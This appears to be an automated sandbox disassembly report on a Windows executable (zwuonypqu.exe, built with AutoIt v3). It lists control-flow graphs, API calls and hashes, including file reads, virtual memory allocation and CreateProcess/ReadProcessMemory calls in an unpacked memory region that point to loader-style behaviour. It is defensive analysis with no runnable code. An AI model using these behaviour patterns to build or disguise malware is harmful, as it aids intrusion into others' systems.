                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$PGH
                        • API String ID: 423443420-3673556320
                        • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                        • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                        • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                        • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                        Control-flow Graph

                        APIs
                        • _fseek.LIBCMT ref: 004525DA
                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                        • __fread_nolock.LIBCMT ref: 00452618
                        • __fread_nolock.LIBCMT ref: 00452629
                        • __fread_nolock.LIBCMT ref: 00452644
                        • __fread_nolock.LIBCMT ref: 00452661
                        • _fseek.LIBCMT ref: 0045267D
                        • _malloc.LIBCMT ref: 00452689
                        • _malloc.LIBCMT ref: 00452696
                        • __fread_nolock.LIBCMT ref: 004526A7
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __fread_nolock$_fseek_malloc_wcscpy
                        • String ID:
                        • API String ID: 1911931848-0
                        • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                        • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                        • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                        • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1293 40f450-40f45c call 425210 1296 40f460-40f478 1293->1296 1296->1296 1297 40f47a-40f4a8 call 413990 call 410f70 1296->1297 1302 40f4b0-40f4d1 call 4151b0 1297->1302 1305 40f531 1302->1305 1306 40f4d3-40f4da 1302->1306 1307 40f536-40f540 1305->1307 1308 40f4dc-40f4de 1306->1308 1309 40f4fd-40f517 call 41557c 1306->1309 1310 40f4e0-40f4e2 1308->1310 1313 40f51c-40f51f 1309->1313 1312 40f4e6-40f4ed 1310->1312 1314 40f521-40f52c 1312->1314 1315 40f4ef-40f4f2 1312->1315 1313->1302 1316 40f543-40f54e 1314->1316 1317 40f52e-40f52f 1314->1317 1318 42937a-4293a0 call 41557c call 4151b0 1315->1318 1319 40f4f8-40f4fb 1315->1319 1320 40f550-40f553 1316->1320 1321 40f555-40f560 1316->1321 1317->1315 1329 4293a5-4293c3 call 4151d0 1318->1329 1319->1309 1319->1310 1320->1315 1323 429372 1321->1323 1324 40f566-40f571 1321->1324 1323->1318 1327 429361-429367 1324->1327 1328 40f577-40f57a 1324->1328 1327->1312 1330 42936d 1327->1330 1328->1315 1329->1307 1330->1323
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __fread_nolock_fseek_strcat
                        • String ID: AU3!$EA06
                        • API String ID: 3818483258-2658333250
                        • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                        • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                        • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                        • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1333 410130-410142 SHGetMalloc 1334 410148-410158 SHGetDesktopFolder 1333->1334 1335 42944f-429459 call 411691 1333->1335 1336 4101d1-4101e0 1334->1336 1337 41015a-410188 call 411691 1334->1337 1336->1335 1343 4101e6-4101ee 1336->1343 1345 4101c5-4101ce 1337->1345 1346 41018a-4101a1 SHGetPathFromIDListW 1337->1346 1345->1336 1347 4101a3-4101b1 call 411691 1346->1347 1348 4101b4-4101c0 1346->1348 1347->1348 1348->1345
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcscpy$DesktopFolderFromListMallocPath
                        • String ID: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe
                        • API String ID: 192938534-321396071
                        • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                        • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                        • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                        • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1351 401230-40123b 1352 401241-401272 call 4131f0 call 401be0 1351->1352 1353 4012c5-4012cd 1351->1353 1358 401274-401292 1352->1358 1359 4012ae-4012bf KillTimer SetTimer 1352->1359 1360 42aa61-42aa67 1358->1360 1361 401298-40129c 1358->1361 1359->1353 1364 42aa8b-42aaa7 Shell_NotifyIconW 1360->1364 1365 42aa69-42aa86 Shell_NotifyIconW 1360->1365 1362 4012a2-4012a8 1361->1362 1363 42aaac-42aab3 1361->1363 1362->1359 1366 42aaf8-42ab15 Shell_NotifyIconW 1362->1366 1367 42aad7-42aaf3 Shell_NotifyIconW 1363->1367 1368 42aab5-42aad2 Shell_NotifyIconW 1363->1368 1364->1359 1365->1359 1366->1359 1367->1359 1368->1359
                        APIs
                        • _memset.LIBCMT ref: 00401257
                          • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                          • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                          • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                          • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                        • KillTimer.USER32 ref: 004012B0
                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                        • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                        • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                        • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                        • String ID:
                        • API String ID: 1792922140-0
                        • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                        • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                        • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                        • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1369 3533480-353352e call 3530e90 1372 3533535-353355b call 3534390 CreateFileW 1369->1372 1375 3533562-3533572 1372->1375 1376 353355d 1372->1376 1384 3533574 1375->1384 1385 3533579-3533593 VirtualAlloc 1375->1385 1377 35336ad-35336b1 1376->1377 1378 35336f3-35336f6 1377->1378 1379 35336b3-35336b7 1377->1379 1381 35336f9-3533700 1378->1381 1382 35336c3-35336c7 1379->1382 1383 35336b9-35336bc 1379->1383 1386 3533702-353370d 1381->1386 1387 3533755-353376a 1381->1387 1388 35336d7-35336db 1382->1388 1389 35336c9-35336d3 1382->1389 1383->1382 1384->1377 1390 3533595 1385->1390 1391 353359a-35335b1 ReadFile 1385->1391 1394 3533711-353371d 1386->1394 1395 353370f 1386->1395 1396 353377a-3533782 1387->1396 1397 353376c-3533777 VirtualFree 1387->1397 1398 35336eb 1388->1398 1399 35336dd-35336e7 1388->1399 1389->1388 1390->1377 1392 35335b3 1391->1392 1393 35335b8-35335f8 VirtualAlloc 1391->1393 1392->1377 1400 35335fa 1393->1400 1401 35335ff-353361a call 35345e0 1393->1401 1402 3533731-353373d 1394->1402 1403 353371f-353372f 1394->1403 1395->1387 1397->1396 1398->1378 1399->1398 1400->1377 1409 3533625-353362f 1401->1409 1406 353374a-3533750 1402->1406 1407 353373f-3533748 1402->1407 1405 3533753 1403->1405 1405->1381 1406->1405 1407->1405 1410 3533662-3533676 call 35343f0 1409->1410 1411 3533631-3533660 call 35345e0 1409->1411 1417 353367a-353367e 1410->1417 1418 3533678 1410->1418 1411->1409 1419 3533680-3533684 CloseHandle 1417->1419 1420 353368a-353368e 1417->1420 1418->1377 1419->1420 1421 3533690-353369b VirtualFree 1420->1421 1422 353369e-35336a7 1420->1422 1421->1422 1422->1372 1422->1377
                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03533551
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03533777
                        Memory Dump Source
                        • Source File: 00000005.00000002.478937282.0000000003530000.00000040.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3530000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                        • Instruction ID: ef632d278265b652f6073a3e2be791bd0bf36b2a353683c0745e99969655e22d
                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                        • Instruction Fuzzy Hash: BBA12878E00209EFDB14CFA4D894BEEBBB5BF49304F248599E105BB290D7759A81CF94

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1423 414f10-414f2c 1424 414f4f 1423->1424 1425 414f2e-414f31 1423->1425 1426 414f51-414f55 1424->1426 1425->1424 1427 414f33-414f35 1425->1427 1428 414f37-414f46 call 417f23 1427->1428 1429 414f56-414f5b 1427->1429 1441 414f47-414f4c call 417ebb 1428->1441 1430 414f6a-414f6d 1429->1430 1431 414f5d-414f68 1429->1431 1434 414f7a-414f7c 1430->1434 1435 414f6f-414f77 call 4131f0 1430->1435 1431->1430 1433 414f8b-414f9e 1431->1433 1439 414fa0-414fa6 1433->1439 1440 414fa8 1433->1440 1434->1428 1438 414f7e-414f89 1434->1438 1435->1434 1438->1428 1438->1433 1443 414faf-414fb1 1439->1443 1440->1443 1441->1424 1446 4150a1-4150a4 1443->1446 1447 414fb7-414fbe 1443->1447 1446->1426 1448 414fc0-414fc5 1447->1448 1449 415004-415007 1447->1449 1448->1449 1450 414fc7 1448->1450 1451 415071-415072 call 41e6b1 1449->1451 1452 415009-41500d 1449->1452 1453 415102 1450->1453 1454 414fcd-414fd1 1450->1454 1460 415077-41507b 1451->1460 1456 41500f-415018 1452->1456 1457 41502e-415035 1452->1457 1463 415106-41510f 1453->1463 1458 414fd3 1454->1458 1459 414fd5-414fd8 1454->1459 1461 415023-415028 1456->1461 1462 41501a-415021 1456->1462 1464 415037 1457->1464 1465 415039-41503c 1457->1465 1458->1459 1468 4150a9-4150af 1459->1468 1469 414fde-414fff call 41ee9b 1459->1469 1460->1463 1470 415081-415085 1460->1470 1471 41502a-41502c 1461->1471 1462->1471 1463->1426 1464->1465 1466 415042-41504e call 41453a call 41ed9e 1465->1466 1467 4150d5-4150d9 1465->1467 1491 415053-415058 1466->1491 1476 4150eb-4150fd call 417f23 1467->1476 1477 4150db-4150e8 call 4131f0 1467->1477 1472 4150b1-4150bd call 4131f0 1468->1472 1473 4150c0-4150d0 call 417f23 1468->1473 1485 415099-41509b 1469->1485 1470->1467 1478 415087-415096 1470->1478 1471->1465 1472->1473 1473->1441 1476->1441 1477->1476 1478->1485 1485->1446 1485->1447 1492 415114-415118 1491->1492 1493 41505e-415061 1491->1493 1492->1463 1493->1453 1494 415067-41506f 1493->1494 1494->1485
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                        • String ID:
                        • API String ID: 3886058894-0
                        • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                        • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                        • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                        • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1495 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                        APIs
                        • CreateWindowExW.USER32 ref: 00410415
                        • CreateWindowExW.USER32 ref: 0041043E
                        • ShowWindow.USER32(?,00000000), ref: 00410454
                        • ShowWindow.USER32(?,00000000), ref: 0041045E
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                        • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                        • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                        • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1496 3533240-353337f call 3530e90 call 3533130 CreateFileW 1503 3533381 1496->1503 1504 3533386-3533396 1496->1504 1505 3533436-353343b 1503->1505 1507 3533398 1504->1507 1508 353339d-35333b7 VirtualAlloc 1504->1508 1507->1505 1509 35333bb-35333d2 ReadFile 1508->1509 1510 35333b9 1508->1510 1511 35333d6-3533410 call 3533170 call 3532130 1509->1511 1512 35333d4 1509->1512 1510->1505 1517 3533412-3533427 call 35331c0 1511->1517 1518 353342c-3533434 ExitProcess 1511->1518 1512->1505 1517->1518 1518->1505
                        APIs
                          • Part of subcall function 03533130: Sleep.KERNELBASE(000001F4), ref: 03533141
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03533375
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478937282.0000000003530000.00000040.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3530000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: 80Z2AYMVNY880IGM3CORR
                        • API String ID: 2694422964-230919289
                        • Opcode ID: 62da15f567112ebce9e361ae4bf5fd939c9f21651f68dd972d1259937c89fcd0
                        • Instruction ID: 429436a2930834bc209ef904e5699ab38d50b29f9209476d6b2f261d65ad8b22
                        • Opcode Fuzzy Hash: 62da15f567112ebce9e361ae4bf5fd939c9f21651f68dd972d1259937c89fcd0
                        • Instruction Fuzzy Hash: 1451A234D04388DAEF11DBE4D858BEEBB79AF55300F044199E248BB2C1D7B94B44CBA6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1520 413a88-413a99 call 41718c 1523 413b10-413b15 call 4171d1 1520->1523 1524 413a9b-413aa2 1520->1524 1525 413aa4-413abc call 418407 call 419f6d 1524->1525 1526 413ae7 1524->1526 1538 413ac7-413ad7 call 413ade 1525->1538 1539 413abe-413ac6 call 419f9d 1525->1539 1528 413ae8-413af8 HeapFree 1526->1528 1528->1523 1531 413afa-413b0f call 417f23 GetLastError call 417ee1 1528->1531 1531->1523 1538->1523 1545 413ad9-413adc 1538->1545 1539->1538 1545->1528
                        APIs
                        • __lock.LIBCMT ref: 00413AA6
                          • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                          • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                          • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                        • ___sbh_find_block.LIBCMT ref: 00413AB1
                        • ___sbh_free_block.LIBCMT ref: 00413AC0
                        • HeapFree.KERNEL32(00000000,00411739,0048C758), ref: 00413AF0
                        • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 2714421763-0
                        • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                        • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                        • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                        • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1546 40f5e0-40f62f call 40f580 call 413990 call 4112ef call 40f6a0 call 40f6d0 1557 40f631-40f653 1546->1557 1557->1557 1558 40f655-40f66d call 414e06 1557->1558 1561 40f673-40f67b call 40f450 1558->1561 1562 42b2ee 1558->1562 1565 42b2f8-42b322 call 4151b0 call 44afdc 1561->1565 1566 40f681-40f695 call 414e94 1561->1566 1562->1565 1573 42b324-42b330 1565->1573 1573->1573 1574 42b332-42b338 call 415484 1573->1574 1576 42b33d-42b343 1574->1576
                        APIs
                          • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                          • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                          • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                        • _strcat.LIBCMT ref: 0040F603
                          • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                          • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                        • String ID: HH
                        • API String ID: 1194219731-2761332787
                        • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                        • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                        • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                        • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                        APIs
                        • _malloc.LIBCMT ref: 00411734
                          • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                          • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                          • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                          • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                        • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                        • __CxxThrowException@8.LIBCMT ref: 00411779
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                        • String ID:
                        • API String ID: 1411284514-0
                        • Opcode ID: f6d0f9ac01cc1593a24bd4fb6812cf372efb98f80d14d441c12493078b846558
                        • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                        • Opcode Fuzzy Hash: f6d0f9ac01cc1593a24bd4fb6812cf372efb98f80d14d441c12493078b846558
                        • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                        APIs
                        • CreateProcessW.KERNEL32(?,00000000), ref: 0353295D
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 035329A3
                        Memory Dump Source
                        • Source File: 00000005.00000002.478937282.0000000003530000.00000040.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3530000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Process$CreateMemoryRead
                        • String ID:
                        • API String ID: 2726527582-0
                        • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                        • Instruction ID: a415768a48eaa6b2118bed55eed1928015d9bf70f640b4571f2c059b69b17b5a
                        • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                        • Instruction Fuzzy Hash: 62621C30A146589BEB24CFA4D850BDEB376FF58300F1095A9D10DEB2A0E7769E81CB59
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
